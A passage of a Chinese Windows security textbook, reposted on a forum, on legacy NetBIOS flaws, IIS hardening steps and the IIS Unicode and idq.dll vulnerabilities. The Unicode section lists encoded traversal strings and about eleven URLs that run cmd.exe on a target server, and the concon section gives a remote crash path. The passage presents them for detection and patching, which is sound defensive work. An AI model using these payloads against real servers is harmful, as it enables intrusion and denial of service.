在Windows 95/98/NT 4.0/2000中的NetBIOS高速缓存执行允许远程插入动态缓存条目,而且可以移走动态和静态缓存条目。这是由NetBIOS缓存的实现和CIFS(Common Internet File System)浏览协议之间的交互引起的。CIFS浏览协议用来生成网络资源的列表,该协议被用在【网上邻居】和【我的网络】等服务中。它还定义了一些浏览帧,这些帧被封装在NetBIOS数据包中。当从138号UDP端口接收到一个浏览帧的请求时,NetBIOS数据包中的信息被提取出来并添加到NetBIOS缓存中。这些信息包括源和目的地的NetBIOS名字、第二源IP地址以及IP头。远程的恶意用户可以通过发送单播或广播类型的UDP数据包,从而使目标计算机对NetBIOS名字到IP地址的解析进行重定向,在其控制之下转发到任意的IP地址。一旦NetBIOS缓存被UDP数据包破坏,就不再需要预测事务标识(事务标识是一个很容易预测的16位的标识)。为了刷新缓存中的动态条目,用户可以发送一个正向名称查询(Positive Name Query)响应,在该响应中提供另一个IP地址给NetBIOS名字映射。
安全建议:Windows的NetBIOS有很多缺陷,建议对NetBIOS进行安全配置。
6. NetBIOS 空源主机名导致系统崩溃
当Windows 95/98收到一个NetBIOS会话包,这个包中源主机名被设置成NULL,那么将导致发生不可预料的错误,如系统崩溃、蓝屏、重启动、死锁或者丢失网络连接等。
攻击程序见netbios空原主机名.txt。
7. 无效驱动器类型拒绝服务漏洞
如果一个Microsoft Windows 9x客户端连接到一个文件/打印共享服务器时,服务器返回一个错误驱动器类型,那么将导致客户端崩溃,必须重新启动来恢复正常正常功能。下列驱动器类型是Windows 9x能识别的:
● 驱动器号
返回给客户端的所有其他的驱动器类型会引起拒绝服务。
8. NetBIOS over TCP/IP 耗尽资源漏洞
执行微软的NetBIOS可能由于一个远程开发漏洞而导致拒绝服务攻击。攻击者能够通过连接NBT端口而促使系统耗尽网络资源并停止工作。
攻击可通过如下方式来进行:初始化许多连接,然后关闭它们,让目标机器上的TCP管接字(socket)处于FINWAIT_1状态。尽管这些管接字最终将超时并被释放,但攻击者可以持续地发送更多请求,初始化并关闭新的连接,耗尽任何空闲的网络资源。结果将导致NetBIOS拒绝正常的服务,直到攻击停止。微软在Windows NT 4.0 sp6中发布了一个补丁程序来修补该漏洞。
简单说来,DOS攻击基本是无法解决的,从SYN Flood理论上来说只要是有限带宽的服务都会遭到拒绝服务,服务器可能只是拒绝服务,一般的PC可能就是系统资源耗尽。而且大量的DOS攻击可以造成防火墙增加大量日志,甚至日志满或者日志爆满。天网防火墙据说是6万记录即满,而6万日志可以很快就可以达到,只要知道天网防火墙过滤哪些东西就攻击哪些东西。这就是强行突破FIREWALL或者IDS的前奏。
解决方法:微软已经针对此漏洞开发了补丁程序程序,下载地址为
9. concon漏洞
可以说,这也是Windows 9x中的一个很老的漏洞了。在Windows 9x中有3个设备驱动程序:CON(输入及输出设备驱动程序)、NUL(空设备驱动程序)、AUX(辅助设备驱动程序)。这3个程序只要被运行,就会引起系统的死机,如运行C:\CON\CON或C:\AUX\AUX等。严重的是此漏洞可以通过资源共享来远程执行,如运行\\192.168.0.2\C\CON\CON(其中\\192.168.0. 2为对方的IP,C为对方的共享盘符)。
解决办法:将系统升级至Windows Me及以上版本、下载安装补丁程序程序 conconfix并添加到“启动”组中或安装网络防火墙.
IIS常见漏洞修补
4.2 IIS常见漏洞修补
微软的操作系统逐渐流行,其服务器也逐渐暴露出弊端,Windows NT服务器也在网上成为入侵者攻击的首选对象。分析造成服务器被攻击和被病毒传染的原因主要有以下3个方面。
1. 管理员安全水平及安全意识差(占65%)
● 管理员口令设置过于简单,甚至有时Administrator和SQL在默认安装下其口令也设置为空,还有管理员的口令有时也设置得过于简单,如使用诸如administrator、admin、root、server、等这一类简单的密码,很容易被入侵者猜破。(占20%)
● 不能及时下载服务器漏洞补丁程序。例如重大漏洞(UNICODE漏洞、中文Windows 2000输入法漏洞)和恶性病毒(红色代码、Nimda)没能下载相应的补丁程序程序。(占30%)
● 服务器首次被攻击后没能及时采取安全措施,因而遭成服务器屡次被攻击。(占5%)
● 不能对服务器进行安全设置,例如对NetBIOS的设置。(占5%)
2. 服务器上存在的漏洞被入侵者利用(占30%)
这是指那些没有被公布的漏洞或是还没有相应的解决方案,或是服务器在使用第三方程序时造成的。
3. 人为原因(占5%)
来自内部人员的攻击,这一类攻击是相当有危害的,因为内部人员对服务器了解甚多,很轻易地就可以实现入侵,并对服务器进行破坏。
下面介绍一些系统典型漏洞的修补方法。
4.2.1 关闭139端口
1. Windows 9x用户
在Windows 9x下如果是拨号上网用户,就完全不需要登录到Windows NT局域网络环境,只需要单击【开始】→【设置】→【控制面板】→【网络】命令,在弹出的【网络】对话框中,删除“Microsoft网络用户”,启用“Microsoft友好登录”,另外也不要设置“文件打印共享”就可以了。
但是如果需要登录到NT网络的话,那这一项就不能删除,因为Windows NT网络中需要使用NetBIOS。
2. Windows NT用户
在Windows NT下可以取消NetBIOS与TCP/IP协议的绑定,方法是:单击【开始】→【设置】→【控制面板】→【网络】命令打开【网络】对话框,选择【NetBIOS接口】选项,禁用【WINS客户(TCP/IP)】复选框后重启。
这样连用户的计算机名和工作组名也隐藏了,不过会造成基于NetBIOS的一些命令无法使用。
3. Windows 2000所有版本
(1) 右击【网络邻居】图标,从弹出的快捷菜单中选择【属性】命令,如图4-1所示。
(2) 在打开的【网络连接】窗口中右击【本地连接】图标,从弹出的快捷菜单中选择【属性】命令,如图4-2所示。
& && && && && &
图4-1 查看【网上邻居】属性& && && &图4-2 查看【本地连接】属性
(3) 在打开的【本地连接 属性】对话框的【此连接使用下列选定的组件】列表框中,双击【Internet协议(TCP/IP)】选项,如图4-3所示。
图4-3 查看【Internet 协议(TCP/IP)】选项
(4) 单击【高级】按钮,在打开的【高级TCP/IP设置】对话框中切换到【选项】选项卡,双击【TCP/IP筛选】选项,如图4-4所示。
图4-4 查看【TCP/IP 筛选】属性
(5) 在【TCP/IP 筛选】对话框中启用“启用TCP/IP筛选(所有适配器)”复选框,如图4-5所示。
图4-5 启用TCP/IP 筛选
(6) 在TCP端口中选择“只允许”单选按钮后单击【添加】按钮,如图4-6所示。
图4-6 只允许开放的TCP端口
(7) 在打开的【添加筛选器】对话框中输入除了139之外所要用到的端口,比如这里只允许开放80端口,如图4-7所示:
图4-7 添加所允许开放的端口
(8) 单击【确定】,此时80端口就被添加到只允许开放的TCP端口中,如图4-8所示。
图4-8 只允许开放的80端口
重新启动计算机后即可生效,计算机重启后便会禁止使用除80端口以外的端口,同时也提高了计算机的安全性。
如果是在局域网中,这样会影响局域网的使用。
4.2.2 IPC$共享漏洞的防范
Windows 2000安装好以后,系统会创建一些隐藏的共享。例如入侵者基于139端口,通过IPC$建立远程空对话连接,或是通过穷举来破解管理员密码入侵系统。微软声称这是为管理而设置的,但这却使服务器的安全又增加了一道安全隐患,
要禁止这些共享,打开【管理工具】→【计算机管理】→【共享文件夹】→【共享】,在相应的共享文件夹上右击,从弹出的快捷菜单中选择【停止共享】命令即可。不过在计算机重新启动后,这些共享又会重新开启用。接下来看一下如何永远禁用这些默认共享。
(1) 运行命令提示符(cmd.exe),在命令提示符下输入如下命令:
运行结果如图4-9所示。
图4-9 查看默认共享
命令解释:
查看本机的默认共享。
(2) 在命令提示符下输入如下命令:
net share ipc$ /delete
运行结果如图4-10所示。
命令解释:
删除ipc$共享。
(3) 逐步使用net share命令,删除c$、d$、e$、f$和admin$共享。
(4) 接着在命令提示符下输入如下命令:
net stop server /y
运行结果如图4-11所示。
命令解释:
停止Server服务,该服务提供 RPC 支持、文件、打印以及命名管道共享。
图4-11 停止Server服务
(5) 运行注册表编辑器,找到如下键值:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
修改注册表键值【AutoShareWks】的Dword值为。
修改注册表键值【AutoShareServer】的Dword值为。
(6) 完成对默认共享的删除操作。
4.2.3 UNICODE漏洞修补
1. 了解UNICODE
● 简单了解:UNICODE漏洞也叫做目录遍历漏洞,受影响的系统如下:
Microsoft IIS 5.0
Microsoft Windows NT 2000
Microsoft IIS 4.0
Microsoft Windows NT 4.0
Microsoft BackOffice 4.5
Microsoft Windows NT 4.0
Microsoft BackOffice 4.0
Microsoft Windows NT 4.0
此漏洞由于入侵者利用服务器扩展UNICODE字符取代“/”和“\”“../”,使服务器目录遍历出现漏洞。未经授权的用户可能利用IUSR_servername账号的上下文空间访问任何已知的文件。该账号在默认情况下属于Everyone和Users组的成员,因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都有可能被删除、修改或执行,就如同合法用户成功登录所能执行的操作一样。
● 深入了解
UNICODE能够使任何语言的字符都可以更容易地被计算机接受,UNICODE由UC(UNICODE协会)管理并接受其技术上的修改。包括Java、LDAP、XML这样的技术标准中均要求得到UNICODE的支持。UNICODE的字符被称为代码点(CODE POINTS),用U后面加上XXXX来表示,其中X为十六进制的字符。
关于中英文版本的IIS UNICODE编码如表4-1所示。
表4-1&&中英文IIS UNICODE编码
操 作 系 统
ISS UNICODE编码
中文 Windows 2000
..%c1%1c..
..%c1%1c../..%c1%1c../..%c1%1c..
..%c0%2f..
..%c0%2f../..%c0%2f../..%c0%2f..
..%255c../..%255c../..%255c..
英文 Windows 2000
..%c0%af..
..%c0%af../..%c0%af../..%c0%af..
Windows NT 4.0
..%c1%9c..
..%c1%9c../ ..%c1%9c../ ..%c1%9c..
2. 检测UNICODE漏洞
这里用简体中文版Windows 2000进行检测,其windows NT服务器版本可以根据其UNICODE
编码进行检测。
在地址栏输入如下其中之一的内容:
http://目标机/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://目标机/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://目标机/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://目标机/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
http://目标机/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
http://目标机/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://目标机/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
http://目标机/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+di
http://目标机/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../wnnt
/system32/cmd.exe?/c+dir+c:\
http://目标机/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://目标机/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
输入以上任意一条向服务器请求内容,可出现的结果就是服务器目录遍历,如图4-12所示。
图4-12 UNICODE漏洞
入侵者可以利用此漏洞和相关软件,得到Administrator组的权限。但现在网上还有约30%的主机存在此漏洞,因此UNICODE漏洞应该引起管理员的重视。
3. 修补UNICODE漏洞
● 下载相应补丁程序程序:
● 临时解决办法
以Windows 2000为例:将winnt\system32下的cmd.exe程序使用权限设置为Administrator组,将文件夹Scripts、msadc、_vti_bin改名。4.2.4 IDQ漏洞修补
涉及程序:Index Server 和 Indexing Service。
描述:利用微软 idq.dll 缓冲区溢出漏洞取得系统管理员权限
微软发布安全公告,指出其Index Server和Indexing Service 存在漏洞。作为安装过程的一部分,IIS 安装了几个ISAPI扩展.dlls。其中的idq.dll存在问题,它是Index Server的一个组件,对管理员脚本(.ida文件)和Internet数据查询(.idq文件)提供支持。但是,idq.dll 在处理一段URL输入的代码中存在一个未经检查的缓冲区。攻击者利用此漏洞能导致受影响服务器产生缓冲区溢出,从而执行自己提供的代码。而更为严重的是,idq.dll 是以SYSTEM身份运行的,攻击者成功利用此漏洞后能取得系统管理员权限。
● 安装了Index Server 或 Index Services,但是没有安装 IIS 的系统无此漏洞。
● 即使 Index Server/Indexing Service 没有开启,但是只要对 .idq 或 .ida 文件的脚本映射存在,攻击者也能利用此漏洞。
受影响平台:
Windows NT 4.0
Windows 2000
Windows XP Beta
受影响版本:
Microsoft Index Server 2.0
Indexing Service in Windows 2000
解决方案:
方案1 下载安装补丁程序。
Windows NT 4.0的补丁下载网址:
Windows 2000 Professional/Server/Advanced Server的补丁下载网址:
Windows 2000 Datacenter Server此版本补丁程序和硬件相关,请用户和原始设备供应商联系。
Windows XP beta:在正式版本会得到解决。
方案2 删除对 .idq 和 .ida 的脚本映射,如图4-13所示。
图4-13 删除IDQ脚本映射
如果其他系统组件被增删,有可能导致该映射被重新自动安装。建议打上补丁程序。
Copyright & KaFan & All Rights Reserved.
Powered by Discuz! X3.1( 苏ICP备号 ) GMT+8,}

我要回帖

更多关于 我喜欢你是寂静的 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信